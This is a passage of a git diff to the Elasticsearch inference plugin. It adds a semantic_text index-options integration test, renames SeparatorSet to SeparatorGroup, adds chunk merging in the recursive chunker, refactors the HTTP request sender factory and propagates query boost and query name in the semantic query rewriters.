+import org.elasticsearch.license.License; +import org.elasticsearch.license.LicenseSettings; +import org.elasticsearch.license.PostStartBasicAction; +import org.elasticsearch.license.PostStartBasicRequest; +import org.elasticsearch.license.PutLicenseAction; +import org.elasticsearch.license.PutLicenseRequest; +import org.elasticsearch.license.TestUtils; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.protocol.xpack.license.GetLicenseRequest; +import org.elasticsearch.reindex.ReindexPlugin; +import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.InternalTestCluster; +import org.elasticsearch.xcontent.ToXContent; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.XContentFactory; +import org.elasticsearch.xcontent.XContentType; +import org.elasticsearch.xpack.core.inference.action.DeleteInferenceEndpointAction; +import org.elasticsearch.xpack.core.inference.action.PutInferenceModelAction; +import org.elasticsearch.xpack.inference.InferenceIndex; +import org.elasticsearch.xpack.inference.LocalStateInferencePlugin; +import org.elasticsearch.xpack.inference.mapper.SemanticTextFieldMapper; +import org.elasticsearch.xpack.inference.mock.TestDenseInferenceServiceExtension; +import org.elasticsearch.xpack.inference.mock.TestInferenceServicePlugin; +import org.elasticsearch.xpack.inference.mock.TestSparseInferenceServiceExtension; +import org.junit.After; +import org.junit.Before; + +import java.io.IOException; +import java.util.Collection; +import java.util.HashMap; +import java.util.List; +import java.util.Map; + +import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; +import static org.hamcrest.CoreMatchers.equalTo; + +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 +public class SemanticTextIndexOptionsIT extends ESIntegTestCase { + private static final String INDEX_NAME = "test-index"; + private static final Map BBQ_COMPATIBLE_SERVICE_SETTINGS = Map.of( + "model", + "my_model", + "dimensions", + 256, + "similarity", + "cosine", + "api_key", + "my_api_key" + ); + + private final Map inferenceIds = new HashMap<>(); + + @Override + protected Settings nodeSettings(int nodeOrdinal, Settings otherSettings) { + return Settings.builder().put(LicenseSettings.SELF_GENERATED_LICENSE_TYPE.getKey(), "trial").build(); + } + + @Override + protected Collection> nodePlugins() { + return List.of(LocalStateInferencePlugin.class, TestInferenceServicePlugin.class, ReindexPlugin.class); + } + + @Before + public void resetLicense() throws Exception { + setLicense(License.LicenseType.TRIAL); + } + + @After + public void cleanUp() { + assertAcked( + safeGet( + client().admin() + .indices() + .prepareDelete(INDEX_NAME) + .setIndicesOptions( + IndicesOptions.builder().concreteTargetOptions(new IndicesOptions.ConcreteTargetOptions(true)).build() + ) + .execute() + ) + ); + + for (var entry : inferenceIds.entrySet()) { + assertAcked( + safeGet( + client().execute( + DeleteInferenceEndpointAction.INSTANCE, + new DeleteInferenceEndpointAction.Request(entry.getKey(), entry.getValue(), true, false) + ) + ) + ); + } + } + + public void testValidateIndexOptionsWithBasicLicense() throws Exception { + final String inferenceId = "test-inference-id-1"; + final String inferenceFieldName = "inference_field"; + createInferenceEndpoint(TaskType.TEXT_EMBEDDING, inferenceId, BBQ_COMPATIBLE_SERVICE_SETTINGS); + downgradeLicenseAndRestartCluster(); + + IndexOptions indexOptions = new DenseVectorFieldMapper.Int8HnswIndexOptions( + randomIntBetween(1, 100), + randomIntBetween(1, 10_000), + null, + null + ); + assertAcked( + safeGet(prepareCreate(INDEX_NAME).setMapping(generateMapping(inferenceFieldName, inferenceId, indexOptions)).execute()) + ); + + final Map expectedFieldMapping = generateExpectedFieldMapping(inferenceFieldName, inferenceId, indexOptions); + assertThat(getFieldMappings(inferenceFieldName, false), equalTo(expectedFieldMapping)); + } + + private void createInferenceEndpoint(TaskType taskType, String inferenceId, Map serviceSettings) throws IOException { + final String service = switch (taskType) { + case TEXT_EMBEDDING -> TestDenseInferenceServiceExtension.TestInferenceService.NAME; + case SPARSE_EMBEDDING -> TestSparseInferenceServiceExtension.TestInferenceService.NAME; + default -> throw new IllegalArgumentException("Unhandled task type [" + taskType + "]"); + }; + + final BytesReference content; + try (XContentBuilder builder = XContentFactory.jsonBuilder()) { + builder.startObject(); + builder.field("service", service); + builder.field("service_settings", serviceSettings); + builder.endObject(); + + content = BytesReference.bytes(builder); + } + + PutInferenceModelAction.Request request = new PutInferenceModelAction.Request( + taskType, + inferenceId, + content, + XContentType.JSON, + TEST_REQUEST_TIMEOUT + ); + var responseFuture = client().execute(PutInferenceModelAction.INSTANCE, request); + assertThat(responseFuture.actionGet(TEST_REQUEST_TIMEOUT).getModel().getInferenceEntityId(), equalTo(inferenceId)); + + inferenceIds.put(inferenceId, taskType); + } + + private static XContentBuilder generateMapping(String inferenceFieldName, String inferenceId, @Nullable IndexOptions indexOptions) + throws IOException { + XContentBuilder mapping = XContentFactory.jsonBuilder(); + mapping.startObject(); + mapping.field("properties"); + generateFieldMapping(mapping, inferenceFieldName, inferenceId, indexOptions); + mapping.endObject(); + + return mapping; + } + + private static void generateFieldMapping( + XContentBuilder builder, + String inferenceFieldName, + String inferenceId, + @Nullable IndexOptions indexOptions + ) throws IOException { + builder.startObject(); + builder.startObject(inferenceFieldName); + builder.field("type", SemanticTextFieldMapper.CONTENT_TYPE); + builder.field("inference_id", inferenceId); + if (indexOptions != null) { + builder.startObject("index_options"); + if (indexOptions instanceof DenseVectorFieldMapper.DenseVectorIndexOptions) { + builder.field("dense_vector"); + indexOptions.toXContent(builder, ToXContent.EMPTY_PARAMS); + } + builder.endObject(); + } + builder.endObject(); + builder.endObject(); + } + + private static Map generateExpectedFieldMapping( + String inferenceFieldName, + String inferenceId, + @Nullable IndexOptions indexOptions + ) throws IOException { + Map expectedFieldMapping; + try (XContentBuilder builder = XContentFactory.jsonBuilder()) { + generateFieldMapping(builder, inferenceFieldName, inferenceId, indexOptions); + expectedFieldMapping = XContentHelper.convertToMap(BytesReference.bytes(builder), false, XContentType.JSON).v2(); + } + + return expectedFieldMapping; + } + + @SuppressWarnings("unchecked") + private static Map filterNullOrEmptyValues(Map map) { + Map filteredMap = new HashMap<>(); + for (var entry : map.entrySet()) { + Object value = entry.getValue(); + if (entry.getValue() instanceof Map mapValue) { + if (mapValue.isEmpty()) { + continue; + } + + value = filterNullOrEmptyValues((Map) mapValue); + } + + if (value != null) { + filteredMap.put(entry.getKey(), value); + } + } + + return filteredMap; + } + + private static Map getFieldMappings(String fieldName, boolean includeDefaults) { + var request = new GetFieldMappingsRequest().indices(INDEX_NAME).fields(fieldName).includeDefaults(includeDefaults); + return safeGet(client().execute(GetFieldMappingsAction.INSTANCE, request)).fieldMappings(INDEX_NAME, fieldName).sourceAsMap(); + } + + private static void setLicense(License.LicenseType type) throws Exception { + if (type == License.LicenseType.BASIC) { + assertAcked( + safeGet( + client().execute( + PostStartBasicAction.INSTANCE, + new PostStartBasicRequest(TEST_REQUEST_TIMEOUT, TEST_REQUEST_TIMEOUT).acknowledge(true) + ) + ) + ); + } else { + License license = TestUtils.generateSignedLicense( + type.getTypeName(), + License.VERSION_CURRENT, + -1, + TimeValue.timeValueHours(24) + ); + assertAcked( + safeGet( + client().execute( + PutLicenseAction.INSTANCE, + new PutLicenseRequest(TEST_REQUEST_TIMEOUT, TEST_REQUEST_TIMEOUT).license(license) + ) + ) + ); + } + } + + private static void assertLicense(License.LicenseType type) { + var getLicenseResponse = safeGet(client().execute(GetLicenseAction.INSTANCE, new GetLicenseRequest(TEST_REQUEST_TIMEOUT))); + assertThat(getLicenseResponse.license().type(), equalTo(type.getTypeName())); + } + + private void downgradeLicenseAndRestartCluster() throws Exception { + // Downgrade the license and restart the cluster to force the model registry to rebuild + setLicense(License.LicenseType.BASIC); + internalCluster().fullRestart(new InternalTestCluster.RestartCallback()); + ensureGreen(InferenceIndex.INDEX_NAME); + assertLicense(License.LicenseType.BASIC); + } +} diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexVersionIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexVersionIT.java index 6f8992b5bd200..8986b0a158e9f 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexVersionIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexVersionIT.java @@ -24,6 +24,7 @@ import org.elasticsearch.search.builder.SearchSourceBuilder; import org.elasticsearch.search.fetch.subphase.highlight.HighlightBuilder; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.index.IndexVersionUtils; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.XContentFactory; @@ -50,6 +51,7 @@ import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertResponse; import static org.hamcrest.Matchers.equalTo; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class SemanticTextIndexVersionIT extends ESIntegTestCase { private static final int MAXIMUM_NUMBER_OF_VERSIONS_TO_TEST = 25; private static final String SPARSE_SEMANTIC_FIELD = "sparse_field"; diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/rest/ServerSentEventsRestActionListenerTests.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/rest/ServerSentEventsRestActionListenerTests.java index 87e14e4e89d88..3287995588d86 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/rest/ServerSentEventsRestActionListenerTests.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/rest/ServerSentEventsRestActionListenerTests.java @@ -45,6 +45,7 @@ import org.elasticsearch.rest.RestRequest; import org.elasticsearch.rest.RestStatus; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.xcontent.ToXContent; import org.elasticsearch.xpack.core.inference.action.InferenceAction; @@ -75,6 +76,7 @@ import static org.hamcrest.Matchers.nullValue; @ESIntegTestCase.ClusterScope(numDataNodes = 1) +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class ServerSentEventsRestActionListenerTests extends ESIntegTestCase { private static final String INFERENCE_ROUTE = "/_inference"; private static final String REQUEST_COUNT = "request_count"; diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/InferenceFeatures.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/InferenceFeatures.java index 2bc481cc484d6..8d91d3e14d181 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/InferenceFeatures.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/InferenceFeatures.java @@ -36,8 +36,12 @@ public class InferenceFeatures implements FeatureSpecification { private static final NodeFeature TEST_RULE_RETRIEVER_WITH_INDICES_THAT_DONT_RETURN_RANK_DOCS = new NodeFeature( "test_rule_retriever.with_indices_that_dont_return_rank_docs" ); + private static final NodeFeature SEMANTIC_QUERY_REWRITE_INTERCEPTORS_PROPAGATE_BOOST_AND_QUERY_NAME_FIX = new NodeFeature( + "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + ); private static final NodeFeature SEMANTIC_TEXT_MATCH_ALL_HIGHLIGHTER = new NodeFeature("semantic_text.match_all_highlighter"); private static final NodeFeature COHERE_V2_API = new NodeFeature("inference.cohere.v2"); + public static final NodeFeature SEMANTIC_TEXT_HIGHLIGHTING_FLAT = new NodeFeature("semantic_text.highlighter.flat_index_options"); @Override public Set getTestFeatures() { @@ -66,7 +70,9 @@ public Set getTestFeatures() { SEMANTIC_TEXT_MATCH_ALL_HIGHLIGHTER, SEMANTIC_TEXT_EXCLUDE_SUB_FIELDS_FROM_FIELD_CAPS, SEMANTIC_TEXT_INDEX_OPTIONS, - COHERE_V2_API + COHERE_V2_API, + SEMANTIC_QUERY_REWRITE_INTERCEPTORS_PROPAGATE_BOOST_AND_QUERY_NAME_FIX, + SEMANTIC_TEXT_HIGHLIGHTING_FLAT ); } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilter.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilter.java index 082ece347208a..3127361de6d11 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilter.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilter.java @@ -631,7 +631,7 @@ private boolean incrementIndexingPressure(IndexRequestWithIndexingPressure index if (indexRequest.isIndexingPressureIncremented() == false) { try { // Track operation count as one operation per document source update - coordinatingIndexingPressure.increment(1, indexRequest.getIndexRequest().source().ramBytesUsed()); + coordinatingIndexingPressure.increment(1, indexRequest.getIndexRequest().source().length()); indexRequest.setIndexingPressureIncremented(); } catch (EsRejectedExecutionException e) { addInferenceResponseFailure( @@ -737,13 +737,13 @@ private void applyInferenceResponses(BulkItemRequest item, FieldInferenceRespons indexRequest.source(builder); } } - long modifiedSourceSize = indexRequest.source().ramBytesUsed(); + long modifiedSourceSize = indexRequest.source().length(); // Add the indexing pressure from the source modifications. // Don't increment operation count because we count one source update as one operation, and we already accounted for those // in addFieldInferenceRequests. try { - coordinatingIndexingPressure.increment(0, modifiedSourceSize - originalSource.ramBytesUsed()); + coordinatingIndexingPressure.increment(0, modifiedSourceSize - originalSource.length()); } catch (EsRejectedExecutionException e) { indexRequest.source(originalSource, indexRequest.getContentType()); item.abort( diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManager.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManager.java index 8aa437c773608..3ddb9883ba007 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManager.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManager.java @@ -105,7 +105,7 @@ public Task createTask(long id, String type, String action, TaskId parentTaskId, flowTask.addListener(TaskBackedProcessor.this::cancelTask); return flowTask; } - }); + }, false); } } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/ChunkingSettingsOptions.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/ChunkingSettingsOptions.java index 5d04df5d2e1d5..c5e4abd3648c5 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/ChunkingSettingsOptions.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/ChunkingSettingsOptions.java @@ -12,7 +12,7 @@ public enum ChunkingSettingsOptions { MAX_CHUNK_SIZE("max_chunk_size"), OVERLAP("overlap"), SENTENCE_OVERLAP("sentence_overlap"), - SEPARATOR_SET("separator_set"), + SEPARATOR_GROUP("separator_group"), SEPARATORS("separators"); private final String chunkingSettingsOption; diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunker.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunker.java index 690a3d8ff0efe..c68dc3b216744 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunker.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunker.java @@ -60,7 +60,10 @@ private List chunk(String input, ChunkOffset offset, List s return chunkWithBackupChunker(input, offset, maxChunkSize); } - var potentialChunks = splitTextBySeparatorRegex(input, offset, separators.get(separatorIndex)); + var potentialChunks = mergeChunkOffsetsUpToMaxChunkSize( + splitTextBySeparatorRegex(input, offset, separators.get(separatorIndex)), + maxChunkSize + ); var actualChunks = new ArrayList(); for (var potentialChunk : potentialChunks) { if (isChunkWithinMaxSize(potentialChunk, maxChunkSize)) { @@ -104,6 +107,33 @@ private List splitTextBySeparatorRegex(String input, ChunkO return chunkOffsets; } + private List mergeChunkOffsetsUpToMaxChunkSize(List chunkOffsets, int maxChunkSize) { + if (chunkOffsets.size() < 2) { + return chunkOffsets; + } + + List mergedOffsetsAndCounts = new ArrayList<>(); + var mergedChunk = chunkOffsets.getFirst(); + for (int i = 1; i < chunkOffsets.size(); i++) { + var chunkOffsetAndCountToMerge = chunkOffsets.get(i); + var potentialMergedChunk = new ChunkOffsetAndCount( + new ChunkOffset(mergedChunk.chunkOffset.start(), chunkOffsetAndCountToMerge.chunkOffset.end()), + mergedChunk.wordCount + chunkOffsetAndCountToMerge.wordCount + ); + if (isChunkWithinMaxSize(potentialMergedChunk, maxChunkSize)) { + mergedChunk = potentialMergedChunk; + } else { + mergedOffsetsAndCounts.add(mergedChunk); + mergedChunk = chunkOffsets.get(i); + } + + if (i == chunkOffsets.size() - 1) { + mergedOffsetsAndCounts.add(mergedChunk); + } + } + return mergedOffsetsAndCounts; + } + private List chunkWithBackupChunker(String input, ChunkOffset offset, int maxChunkSize) { var chunks = new SentenceBoundaryChunker().chunk( input.substring(offset.start(), offset.end()), diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettings.java index c368e1bb0c255..611736ceb4213 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettings.java @@ -36,7 +36,7 @@ public class RecursiveChunkingSettings implements ChunkingSettings { private static final Set VALID_KEYS = Set.of( ChunkingSettingsOptions.STRATEGY.toString(), ChunkingSettingsOptions.MAX_CHUNK_SIZE.toString(), - ChunkingSettingsOptions.SEPARATOR_SET.toString(), + ChunkingSettingsOptions.SEPARATOR_GROUP.toString(), ChunkingSettingsOptions.SEPARATORS.toString() ); @@ -45,7 +45,7 @@ public class RecursiveChunkingSettings implements ChunkingSettings { public RecursiveChunkingSettings(int maxChunkSize, List separators) { this.maxChunkSize = maxChunkSize; - this.separators = separators == null ? SeparatorSet.PLAINTEXT.getSeparators() : separators; + this.separators = separators == null ? SeparatorGroup.PLAINTEXT.getSeparators() : separators; } public RecursiveChunkingSettings(StreamInput in) throws IOException { @@ -72,12 +72,12 @@ public static RecursiveChunkingSettings fromMap(Map map) { validationException ); - SeparatorSet separatorSet = ServiceUtils.extractOptionalEnum( + SeparatorGroup separatorGroup = ServiceUtils.extractOptionalEnum( map, - ChunkingSettingsOptions.SEPARATOR_SET.toString(), + ChunkingSettingsOptions.SEPARATOR_GROUP.toString(), ModelConfigurations.CHUNKING_SETTINGS, - SeparatorSet::fromString, - EnumSet.allOf(SeparatorSet.class), + SeparatorGroup::fromString, + EnumSet.allOf(SeparatorGroup.class), validationException ); @@ -88,12 +88,12 @@ public static RecursiveChunkingSettings fromMap(Map map) { validationException ); - if (separators != null && separatorSet != null) { + if (separators != null && separatorGroup != null) { validationException.addValidationError("Recursive chunking settings can not have both separators and separator_set"); } - if (separatorSet != null) { - separators = separatorSet.getSeparators(); + if (separatorGroup != null) { + separators = separatorGroup.getSeparators(); } else if (separators != null && separators.isEmpty()) { validationException.addValidationError("Recursive chunking settings can not have an empty list of separators"); } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorSet.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorGroup.java similarity index 89% rename from x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorSet.java rename to x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorGroup.java index 61b997b8d17a9..cafd3b08ccf9b 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorSet.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/SeparatorGroup.java @@ -10,17 +10,17 @@ import java.util.List; import java.util.Locale; -public enum SeparatorSet { +public enum SeparatorGroup { PLAINTEXT("plaintext"), MARKDOWN("markdown"); private final String name; - SeparatorSet(String name) { + SeparatorGroup(String name) { this.name = name; } - public static SeparatorSet fromString(String name) { + public static SeparatorGroup fromString(String name) { return valueOf(name.trim().toUpperCase(Locale.ROOT)); } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSender.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSender.java index 689c9e2ec8fc1..f870f997153a4 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSender.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/external/http/sender/HttpRequestSender.java @@ -11,7 +11,6 @@ import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.ContextPreservingActionListener; import org.elasticsearch.cluster.service.ClusterService; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Nullable; import org.elasticsearch.core.TimeValue; import org.elasticsearch.inference.InferenceServiceResults; @@ -42,32 +41,39 @@ public class HttpRequestSender implements Sender { * A helper class for constructing a {@link HttpRequestSender}. */ public static class Factory { - private final ServiceComponents serviceComponents; - private final HttpClientManager httpClientManager; - private final ClusterService clusterService; - private final RequestSender requestSender; + private final HttpRequestSender httpRequestSender; public Factory(ServiceComponents serviceComponents, HttpClientManager httpClientManager, ClusterService clusterService) { - this.serviceComponents = Objects.requireNonNull(serviceComponents); - this.httpClientManager = Objects.requireNonNull(httpClientManager); - this.clusterService = Objects.requireNonNull(clusterService); + Objects.requireNonNull(serviceComponents); + Objects.requireNonNull(clusterService); + Objects.requireNonNull(httpClientManager); - requestSender = new RetryingHttpSender( - this.httpClientManager.getHttpClient(), + var requestSender = new RetryingHttpSender( + httpClientManager.getHttpClient(), serviceComponents.throttlerManager(), new RetrySettings(serviceComponents.settings(), clusterService), serviceComponents.threadPool() ); - } - public Sender createSender() { - return new HttpRequestSender( + var startCompleted = new CountDownLatch(1); + var service = new RequestExecutorService( serviceComponents.threadPool(), - httpClientManager, - clusterService, - serviceComponents.settings(), + startCompleted, + new RequestExecutorServiceSettings(serviceComponents.settings(), clusterService), requestSender ); + + httpRequestSender = new HttpRequestSender( + serviceComponents.threadPool(), + httpClientManager, + requestSender, + service, + startCompleted + ); + } + + public Sender createSender() { + return httpRequestSender; } } @@ -75,27 +81,23 @@ public Sender createSender() { private final ThreadPool threadPool; private final HttpClientManager manager; - private final RequestExecutor service; private final AtomicBoolean started = new AtomicBoolean(false); - private final CountDownLatch startCompleted = new CountDownLatch(1); private final RequestSender requestSender; + private final RequestExecutor service; + private final CountDownLatch startCompleted; private HttpRequestSender( ThreadPool threadPool, HttpClientManager httpClientManager, - ClusterService clusterService, - Settings settings, - RequestSender requestSender + RequestSender requestSender, + RequestExecutor service, + CountDownLatch startCompleted ) { this.threadPool = Objects.requireNonNull(threadPool); this.manager = Objects.requireNonNull(httpClientManager); this.requestSender = Objects.requireNonNull(requestSender); - service = new RequestExecutorService( - threadPool, - startCompleted, - new RequestExecutorServiceSettings(settings, clusterService), - requestSender - ); + this.service = Objects.requireNonNull(service); + this.startCompleted = Objects.requireNonNull(startCompleted); } /** diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/highlight/SemanticTextHighlighter.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/highlight/SemanticTextHighlighter.java index 92333a10c4d08..8e55cc9c222b5 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/highlight/SemanticTextHighlighter.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/highlight/SemanticTextHighlighter.java @@ -32,6 +32,7 @@ import org.elasticsearch.search.fetch.subphase.highlight.HighlightField; import org.elasticsearch.search.fetch.subphase.highlight.HighlightUtils; import org.elasticsearch.search.fetch.subphase.highlight.Highlighter; +import org.elasticsearch.search.vectors.DenseVectorQuery; import org.elasticsearch.search.vectors.SparseVectorQueryWrapper; import org.elasticsearch.search.vectors.VectorData; import org.elasticsearch.xcontent.Text; @@ -273,6 +274,8 @@ public void visitLeaf(Query query) { queries.add(fieldType.createExactKnnQuery(VectorData.fromBytes(knnQuery.getTargetCopy()), null)); } else if (query instanceof MatchAllDocsQuery) { queries.add(new MatchAllDocsQuery()); + } else if (query instanceof DenseVectorQuery.Floats floatsQuery) { + queries.add(fieldType.createExactKnnQuery(VectorData.fromFloats(floatsQuery.getQuery()), null)); } } }); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapper.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapper.java index 5400bf6acc673..be0349c11f402 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapper.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/mapper/SemanticTextFieldMapper.java @@ -99,6 +99,7 @@ import java.util.function.Function; import java.util.function.Supplier; +import static org.elasticsearch.index.IndexVersions.NEW_SPARSE_VECTOR; import static org.elasticsearch.index.IndexVersions.SEMANTIC_TEXT_DEFAULTS_TO_BBQ; import static org.elasticsearch.index.IndexVersions.SEMANTIC_TEXT_DEFAULTS_TO_BBQ_BACKPORT_8_X; import static org.elasticsearch.inference.TaskType.SPARSE_EMBEDDING; @@ -124,6 +125,7 @@ */ public class SemanticTextFieldMapper extends FieldMapper implements InferenceFieldMapper { private static final Logger logger = LogManager.getLogger(SemanticTextFieldMapper.class); + public static final String UNSUPPORTED_INDEX_MESSAGE = "[semantic_text] is available on indices created with 8.11 or higher."; public static final NodeFeature SEMANTIC_TEXT_IN_OBJECT_FIELD_FIX = new NodeFeature("semantic_text.in_object_field_fix"); public static final NodeFeature SEMANTIC_TEXT_SINGLE_FIELD_UPDATE_FIX = new NodeFeature("semantic_text.single_field_update_fix"); public static final NodeFeature SEMANTIC_TEXT_DELETE_FIX = new NodeFeature("semantic_text.delete_fix"); @@ -156,6 +158,9 @@ public static final TypeParser parser(Supplier modelRegistry) { public static BiConsumer validateParserContext(String type) { return (n, c) -> { + if (c.getIndexSettings().getIndexVersionCreated().before(NEW_SPARSE_VECTOR)) { + throw new UnsupportedOperationException(UNSUPPORTED_INDEX_MESSAGE); + } if (InferenceMetadataFieldsMapper.isEnabled(c.getIndexSettings().getSettings()) == false) { notInMultiFields(type).accept(n, c); } @@ -1223,7 +1228,7 @@ static boolean indexVersionDefaultsToBbqHnsw(IndexVersion indexVersion) { || indexVersion.between(SEMANTIC_TEXT_DEFAULTS_TO_BBQ_BACKPORT_8_X, IndexVersions.UPGRADE_TO_LUCENE_10_0_0); } - static DenseVectorFieldMapper.DenseVectorIndexOptions defaultBbqHnswDenseVectorIndexOptions() { + public static DenseVectorFieldMapper.DenseVectorIndexOptions defaultBbqHnswDenseVectorIndexOptions() { int m = Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN; int efConstruction = Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH; DenseVectorFieldMapper.RescoreVector rescoreVector = new DenseVectorFieldMapper.RescoreVector(DEFAULT_RESCORE_OVERSAMPLE); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticKnnVectorQueryRewriteInterceptor.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticKnnVectorQueryRewriteInterceptor.java index 9e513a1ed9226..b1f5c240371f8 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticKnnVectorQueryRewriteInterceptor.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticKnnVectorQueryRewriteInterceptor.java @@ -52,16 +52,20 @@ protected QueryBuilder buildInferenceQuery(QueryBuilder queryBuilder, InferenceI assert (queryBuilder instanceof KnnVectorQueryBuilder); KnnVectorQueryBuilder knnVectorQueryBuilder = (KnnVectorQueryBuilder) queryBuilder; Map> inferenceIdsIndices = indexInformation.getInferenceIdsIndices(); + QueryBuilder finalQueryBuilder; if (inferenceIdsIndices.size() == 1) { // Simple case, everything uses the same inference ID Map.Entry> inferenceIdIndex = inferenceIdsIndices.entrySet().iterator().next(); String searchInferenceId = inferenceIdIndex.getKey(); List indices = inferenceIdIndex.getValue(); - return buildNestedQueryFromKnnVectorQuery(knnVectorQueryBuilder, indices, searchInferenceId); + finalQueryBuilder = buildNestedQueryFromKnnVectorQuery(knnVectorQueryBuilder, indices, searchInferenceId); } else { // Multiple inference IDs, construct a boolean query - return buildInferenceQueryWithMultipleInferenceIds(knnVectorQueryBuilder, inferenceIdsIndices); + finalQueryBuilder = buildInferenceQueryWithMultipleInferenceIds(knnVectorQueryBuilder, inferenceIdsIndices); } + finalQueryBuilder.boost(queryBuilder.boost()); + finalQueryBuilder.queryName(queryBuilder.queryName()); + return finalQueryBuilder; } private QueryBuilder buildInferenceQueryWithMultipleInferenceIds( @@ -102,6 +106,8 @@ protected QueryBuilder buildCombinedInferenceAndNonInferenceQuery( ) ); } + boolQueryBuilder.boost(queryBuilder.boost()); + boolQueryBuilder.queryName(queryBuilder.queryName()); return boolQueryBuilder; } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/queries/SemanticMatchQueryRewriteInterceptor.java 